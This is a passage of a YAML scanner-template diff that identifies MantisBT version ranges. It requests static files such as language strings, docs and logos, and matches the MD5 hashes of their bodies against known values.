matchers: + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"f1e2808f2f12d9f3952835384fba9bf1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"d00075f368ddb9dc6a63e2beb6e97759\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"fa07398cd9e328474fc39367a121f716\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.24.3 + dsl: + - "(\"0eab425ca8985b0e6c6955852738c869\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.14.0 - 2.18.1 + dsl: + - "(\"fc276ea31091a5aaa544cfb951d237e7\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.24.3 + dsl: + - "(\"7e417ad80c69048cee80d8f8b9df5d5c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/README.md" + + matchers: + - type: dsl + name: 2.19.0 - 2.24.3 + dsl: + - "(\"ed26bacc7c500a31b5b3b5cf3827cfe9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/vendor/Web.config" + + matchers: + - type: dsl + name: 2.20.1 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/html.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.8.1 + dsl: + - "(\"ea608a51a9075d13c7809f51fe689365\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"4efe58d412c61767cc2323abf56e7877\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.20.1 + dsl: + - "(\"36822d9911d3eb205488978addc7cbe9\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.24.3 + dsl: + - "(\"fb470c8f1ecf036cdc1f0f15c1d0a90e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_eo.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"3d9a4cd1da33fc68ee423c474d6cece4\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8398db5cf9ead698b805f740f7154952\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_basque.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.15.1 + dsl: + - "(\"f79098275a282cad48dd81c36f68aab7\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"fd4b22eb4723e170f452bf2e79075b69\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"034ee5c0b0e95e1298504550a3bf08d3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"804215df625b9fdf23dd7645dda26026\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"d70c548dc2ccd26ca526154b5cf87aef\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"02665c1324884758d3d7b9547472bf7c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"fe7be15900bde9018f9babe431494b59\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"6bba849c342edab27a6d421c83662574\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"9b22fe86e58dcab5264d418fce84f629\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.16.1 + dsl: + - "(\"3c74e20f97be25b1f0a5000cba936aa9\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"842ba587b6082f631805a25dcbae931f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"fb726314bfc300b6736f0b4cec162d55\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"39745f8fa2d63b7e9def19e328e1bf1b\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"f02a5be18dc4756b7cf6fdf5a344dd52\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"66c5be5ecc019e5faa2528e0d9b33f2a\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e953cdbaf82d6d47274bcbbadf632397\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"00e8c4e5709edf7cc5a915fc377be9fa\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d278e0302cc7ca145182d7464a50328c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"6ffaea95e8367b4f476842723fc93ac8\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"bb490d4fcca19c140d719c1f9fcec2f9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"939f3c4bae864185e77ab759b68fe4dd\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.21.3 + dsl: + - "(\"67d295a01d61e3b607b61caacba7d64a\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"8398e1f69fcf05465ae2be9e8e9939c8\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8fb6408c1eeef46c8a3efad7e02e8cb3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Bug.xml" + + matchers: + - type: dsl + name: 1.3.4 - 2.7.1 + dsl: + - "(\"2f0cd4bf1f465e06e9221b59d29fcbc3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"6873b971a54ace1eed1452b420c2dd13\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.20.1 + dsl: + - "(\"80e031b8398a35304524aa8786205bd9\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"6774d2db3ec04cd9b95b0d153673eb6e\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"205c2baebd8a763ce674c09e798eaaf7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"31c2a044b7c630abee6cc3ecb2425369\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.19.1 + dsl: + - "(\"40099f192db7e6d7639e4aaeac2b7073\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"e8be458a3439471c8b769da221b0e6f7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"a02d326ef9769fc0b30f2b96f710bacf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.19.1 + dsl: + - "(\"105ac32dcf6af2067036ad35a608c7a7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"771f6563b0dbd96c4fe3ab72f1b8eca3\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"4c5643c5f0b7e8fece689d7932f1a758\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_italian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"480a11c1706f2a5e54e87cea98a4a5c8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"b7b5b983331d342820286e4318724a30\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"aedaba6acd6b98fc4c18af9ccd061a31\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"697d0cffda98c4cc19b359c773366613\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"e54eced373cd8faa24fb1b44591cc340\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f0af93d3cfaae95cacb44a7568b689e9\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9803000f0d2c4bfb5b5ca3dd9bf6f9c3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"19c30c56335660e0fd94c8957154b124\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"bba5577f02997314cd6af6bfc12a54ae\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"c193ecca954fa9ba49e4308ce578dc8e\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"5b46ca79c400e40ef8c4fa29f5477fd1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"340ea844c9d132d10cce1b5ab410ab27\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"70b5ee9868d4e625525a5cee4e4faaa4\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"67a97118b49d2718ca4ae1fed6fd86eb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_english.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"f39c2f6ddd0d50366c52884e25114c17\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"650f3d6449b61fd63a72130bc566db6d\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"7f0903158e6fc53a22050d09739b1540\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"900fc9322d34e1174c53dc8039ab59a1\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"b09643ae4e40609533ef5cf2cd15bb1d\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"f608986a12072c8c95f963ce694a5475\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e6bc42f10cb381da20dd25283da0f55b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a48a7e0d0c93ebe3a4db48824f24664d\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"bce1c503f9ac61f0a716bf1189f665ff\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"78f48f3b5f06eae5ec6b016116265c63\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.16.1 + dsl: + - "(\"cf50485ffd25ab508909ce1e770fdd15\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"785947960ff3b15ff62238fb47ac2bb8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"fd4a3b05932bbbeb71d8ab13c5faea6f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"15c7939de81c2a9881d2f81382e68bd9\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a553efa15d9ba6204e4234e7c93f0b2d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"1d2e0617458015e259757483c538c9bf\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"471831757cfe1bd05c4a43198d5e4ec6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"725639306e6fd530bc0ab37932f86787\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"fa68f188cd40be6c21f54fcc6b8882aa\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"ff6e622ac3612be2db50f457ac33eda1\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"8fa85145910e2fa30442208e78f31868\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"5cdbad61803664b6cd4ea53265299321\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"ea62187dad047859f7154086385496a9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.6.0 + dsl: + - "(\"ab61e7c25d370282d7173caca16afa68\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"7f79f21df30693c017ae06d311836f0c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"af52b57dd8376e3e0bd7084884d0819f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8d59a1d3b3acf4e085d3042ca0127c04\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"5e579d02ef292661eed116ab8fe34da5\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"be2b68181517dc784e0e6c5c9ef47649\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.19.1 + dsl: + - "(\"3e31785b3364b9427a2f687847a0ecf9\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"7b34295a84a685dedd29b8b1796177f9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"bab7da020c2bd472ced01366c5c00764\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.14.0 + dsl: + - "(\"43209f47d5e6aa2cb459213e5b5591f8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"86f13b0cbfca22d7765a054352662521\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"c82d3345eb44bf7dce45fb7312460417\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"b9916dac402fb91887c611caae5d2873\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"7cc33c41a013f12eb19bac13717bd78e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"e72665b0607bf24d6fe892efa61b22d0\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"90c8bfc44417b5f0f0adc6d969c373fc\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"c72944076d40cd1792bf61e9b12dbd6d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8fbe3907290c6f0b988c6cddf2cd2a36\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b8811c4f9dcdf8d85078b2014da73370\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"878a0277e1a094e1e60ef709faee9133\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"d1e135ee940765ddba0566e16b0e77e9\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.19.1 + dsl: + - "(\"d173b1f6e6179899ebe14110eb4e893a\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"e49b701869e180f9bc6522c3ce7e1290\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"e27544ab27d4ccc69dff57030a1dd734\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_arabicegyptianspoken.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.17.2 + dsl: + - "(\"b53e40613b361825f18d3f3da332c1d4\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"4ccf8e640b424e812370c12655aedb8e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"fc315ea878435d64d4b4a58ed7f9062f\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"fa0fea088d31e12dbaf1c58225bb752e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"d173faebad2f8842df83aca6950358bb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d325cb7411f5e6bb647ff85f2d3be6be\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"cff87956b3c51854f99df67a2f0688c2\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"d5ce7db854403c7b6aaef5d9f0560da0\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.22.2 + dsl: + - "(\"ca2ff5e4ec8e123a83d51feb6f5f210d\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"23bbc91e28fbdf2b360c8c651ca80e84\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_piedmontese.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.22.2 + dsl: + - "(\"96cb5bd0e47bd93bd8084957a61fa38d\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8227858d7450d6b437acc2cfdd6e5305\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_luxembourgish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.22.2 + dsl: + - "(\"f93dec68c192060839049290bc9e26e9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"82835f042b5f11b8d411e41782ba4f46\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.22.2 + dsl: + - "(\"779fea8cbb0db3b33b77d53aa300f355\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"0acb3cec05a73ac8a6d1eaf13438c548\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_tagalog.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"ee7e9d8f9018eb3e42fa325a3e4c077d\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"47a0a77ce4a88a2e6c3795c30545e1cd\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"15b72919e39f86c63dfa5dcb14145aef\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8cc68b85bc8a646ac3cb2cc175947ad4\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"5262c77447d3d68536f32f6fc4c48234\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"cc3d017293a5d1cf0f2552a146c8141d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"53dcf39e318e1921161644f0303c1eee\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"0a01d74418afbb3dde4da0f7ddf41b24\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"7e1c71b9a12d5d78c5ea9fa627240e34\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"18aeb53b5c4acd602b3fb1d6478409a9\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"1657c98d5278c26599f3bda5904f7acc\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"abe0a10439fe0fcb3424396dce6061f0\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"9beca9ddaa7ba03b48a4f09507b4445d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a10fc5bbf47c8650c0fbf0bdab435f0c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"fa3c6a64f8281c9a585b04dcf97a1fdf\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b980ddce5e9591906dd480f523a204df\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"02ac072c9ce81d138f1fc851963a347a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"83f0c11b7fa595b485c30baf37b2d951\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"8822346e8377963c20224b892922ab38\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"94f67e8251519b060698f5ef7fcbd0bf\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"cec9dd24e83507787bb954e5a7673889\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"1f0a8e6c09448030ff42661ecf6baba1\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1a54874beb8a584797934b69cba2db76\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_swissgerman.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"a45a7df554afb24cbf098b56bcf02bf9\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"164737ccfb92d5f0354701a13cbe0e80\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"ccf7aa8a150b947a99c1b479f6be60f8\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"52125cfe5861026a8bb06ead58dce8a0\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"df92cbd57e6c70476006d8bb74438581\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9b379075e631904411e5a0554bab54a4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"27649c3072afb13196d185672ed6b9d2\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"587fb4c976dcc5c476142fff7cae0577\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"00edc90441f43d26d2944a6300ca204c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_zh-cn.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"051f7457b556a365a761ce556c5cb71b\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"14c2d4681ae6ba43d893d98c56acf2e8\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"785b3be3365b72ea363ece4a79d08f3d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_romanian.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"13951a5e7e23daf4ec386bdbbfd3978a\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"7134d1658a57a530286e992991544836\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"fc949cdc46fd58686d07be3df6668032\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e05e17dc531b0486a6f5bdc3b1c8bdb8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"4dfe86861f0a45ebd203e1a4fe2e5c4e\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"a812d5adf92bf8dad1e3eb18217f333b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"5966fd8dce2bd75e78e1e6c1a31e86f6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"d26829dd1a5c80d611050b2d3b5c6e53\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"0d2890951b018ae6fab522d27bec354c\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"99a622a390f4af90c69da0c8f4c72336\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"7c0a46ff02c75bd65fd8919245b42765\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"8a3f7fd7dc78f895404282769b42d276\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"c5e66f9d2baed731232a8d698fa789e8\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"6a74c7654f12f04a5895f4f4ca4afcab\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"0912590d89eae333e9df410520f7a6ea\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"147dabae378131749ee8a234700cdaa8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"eb7cd29a95e6c1d8aaeb0f85d1a3e808\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"6b8e956ccd94efde891156a014644588\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"3d283662a6e836ad2f8ec695b63b980f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"b9c727db6cd6f0e322a952fa5bc9796a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_occitan.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.22.2 + dsl: + - "(\"e435a4d72dd24dc5c85b2878c32c70af\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"627811f64c9b2511e14ed826b5c913a1\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"9fe3dff48ce145aee19cae9a58b19d59\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"b980317e4d6cdf62ef6d59101fad1886\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"205eeb7660666cfe5b8d51391e86fc88\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"b91ec746eb5c71a8bd4acb9b6386e6ba\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"5159efa0d97ac9b022602b07be79d50c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"ebb2bb785a49d3e95b291c979b5943d3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d98db8e6d5cff035ef9f6d3c23de3961\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"92cbafd26a9f96098632cfea8781488f\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"dd2a3e5f9509eb59b72da7a3b27ffd93\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"9dff6c607b93f88220d922ae04616354\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"edcca82a65f0bb22950c6df501355ffe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_logo.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"6f6f731ce54f063ef1020ad6cf8596d3\" == md5(body))" + - type: dsl + name: 1.2.10 - 1.3.20 + dsl: + - "(\"ba46364c699a330ee0aad0013db3054b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"9ae11327423fda16d18ed021fe5c20f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_logo.gif" + + matchers: + - type: dsl + name: 1.2.10 - 2.22.2 + dsl: + - "(\"62c52c31a69302501cf33c7e90e6ffc0\" == md5(body))" + - type: dsl + name: 1.0.7 - 1.2.8 + dsl: + - "(\"4222aae730fece529b6014b991127ae7\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.6 + dsl: + - "(\"b86ada7031cf46532f1490b9857e0e4e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1b2b92ab89363d9110a6968e407efc85\" == md5(body))" + + - method: GET + path: + - 